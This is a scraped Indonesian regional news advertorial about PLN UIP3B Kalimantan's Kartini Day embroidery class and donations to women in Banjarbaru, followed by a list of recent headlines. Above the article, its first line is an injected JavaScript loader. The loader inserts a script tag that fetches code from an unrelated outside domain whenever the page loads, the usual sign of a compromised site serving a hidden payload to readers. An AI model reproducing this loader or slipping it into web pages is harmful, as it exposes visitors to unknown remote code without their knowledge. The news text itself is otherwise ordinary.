(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
PLN UIP3B KALIMANTAN

“Embroidery Mini Class” Perayaan Hari Kartini di Lingkungan PLN UIP3B Kalimantan


KANALKALIMANTAN.COM, BANJARBARU – Memperingati Hari Kartini 2024 PT PLN (Persero) Unit Induk Penyaluran dan Pusat Pengatur Beban (UIP3B) Kalimantan melalui Srikandi menggelar acara Embroidery Mini Class di aula Sultan Suriansyah, kantor induk PLN UIP3B Kalimantan, Kamis (25/4/2024). Acara dibuka oleh Senior Manager Keuangan, Komunikasi dan Umum, Rahayu Arimbi yang juga Ketua Gugus Tugas Srikandi PLN UIP3B Kalimantan diikuti oleh seluruh pegawai organik, Persatuan Istri Karyawan Karyawati (PIKK), Tenaga Alih Daya (TAD), dan Srikandi dari Unit Pelaksana Transmisi (UPT) Banjarbaru serta Unit Pelaksana Pengatur Beban (UP2B) Kalselteng.

General Manager PLN UIP3B Kalimantan, Abdul Salam Nganro mengatakan, kegiatan ini bertujuan untuk meningkatkan pemberdayaan perempuan melalui keterampilan yang berharga dan menginspirasi perempuan untuk meraih potensi penuh dalam dunia kreativitas dan keahlian tangan.

“Mari kita jadikan Hari Kartini sebagai kesempatan untuk terus mendukung perempuan-perempuan di PLN, memberikan mereka ruang dan kesempatan untuk berkembang, serta menghadirkan lingkungan kerja yang inklusif dan mendukung bagi semua,” ucap Salam.

Baca juga: Sejarah Hari Tari Sedunia 29 April

Salam mengingatkan pentingnya peran dan kontribusi yang telah diberikan oleh para perempuan dalam menjaga kelancaran operasional perusahaan serta dalam memastikan pelayanan yang terbaik kepada pelanggan. Salam mengapresiasi dedikasi dan komitmen yang luar biasa dalam menjalankan tugas dan peran masing-masing dengan baik, sebagai pegawai perempuan maupun istri pegawai.

“Hari Kartini adalah saat yang tepat bagi kami untuk merayakan semangat dan keberanian Kartini modern yang ada di antara kami, yang terus menginspirasi dengan dedikasi dan kerja keras mereka. Kami berkomitmen untuk terus mendukung kemajuan dan kesetaraan gender di lingkungan kerja kami, sehingga setiap perempuan dapat meraih potensinya sepenuhnya dalam membangun masa depan yang lebih baik bagi perusahaan dan masyarakat secara luas,” tutur Salam.

Baca juga: Peringati Hari Tari Sedunia, Ratusan Penari Tampil di Taman Budaya Kalsel

Dalam kegiatan ini juga turut disampaikan santunan kepada lima orang perwakilan muslimah tangguh sebagai wujud syukur dan komitmen PLN UIP3B Kalimantan dalam mendukung peran serta mereka di masyarakat. Arimbi berharap melalui santunan ini semoga dapat menjadi suntikan semangat dan harapan baru bagi mereka untuk terus melangkah maju dalam perjalanan hidup saat ini.

“Pada kesempatan yang luar biasa ini, kami merasa terhormat dapat memberikan santunan kepada para muslimah tangguh. Teruslah berkarya dan menginspirasi, karena setiap langkah kecil yang kita ambil membawa makna besar bagi masa depan yang lebih baik,” ungkap Arimbi.

Marsaidah, salah satu muslimah tangguh yang turut menjadi peserta dalam kegiatan Mini Embroidery Class menyampaikan rasa terima kasih kepada PLN atas santunan yang diterima.

Baca juga: Peringati Hari Kartini, PLN Beri Santunan 30 Muslimah Tangguh di Banjarbaru

“Penyampaian dari Ibu Ketua Srikandi akan terus tersimpan di pikiran saya, dimana menjadi sosok perempuan itu tidaklah mudah. Perempuan adalah sosok yang kuat, dengan tangguhnya mampu bertahan dalam kondisi yang rumit secara sekaligus,” ucap Marsaidah.

Baca juga: Kafilah HSU Paling Awal Tampil saat Pawai Ta’aruf MTQ

Peringatan Hari Kartini merupakan momen bagi seluruh perempuan di Indonesia untuk terus mengimplementasikan semangat juang RA Kartini dalam bekerja, bersosial, maupun menjadi ibu bagi anak-anak harapan keluarga. Seperti yang tertulis dalam kata-kata bijak RA Kartini, “Perempuan adalah Pembawa Peradaban.” (Kanalkalimantan.com/adv)

Editor : kk


Muhammad Andi

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

2 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

3 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

4 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

5 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

8 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

11 jam ago

This website uses cookies.